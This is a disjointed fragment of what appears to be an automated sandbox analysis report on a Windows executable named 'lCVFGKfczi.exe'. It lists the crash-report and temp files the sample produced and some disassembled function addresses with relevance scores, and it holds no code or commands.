C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_lCVFGKfczi.exe_dd6fc0a24c1ab7b4dde8979f3c28f822e740f212_5ff4b866_ea499fab-ca7d-4417-8dd7-5f26e4068e9c\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3616.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3674.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER36A4.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9FAD.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA413.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA443.tmp.xml

C:\Users\user\AppData\Local\Temp\delays.tmp

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Windows Analysis Report
lCVFGKfczi.exe

Function 00DC2021 Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 631
memoryCOMMON

Function 00DD8E2E Relevance: 4.7, APIs: 3, Instructions: 202
COMMON

Function 00DDA3A6 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Function 00DD6368 Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Function 00DD9FAA Relevance: 1.6, APIs: 1, Instructions: 147
COMMON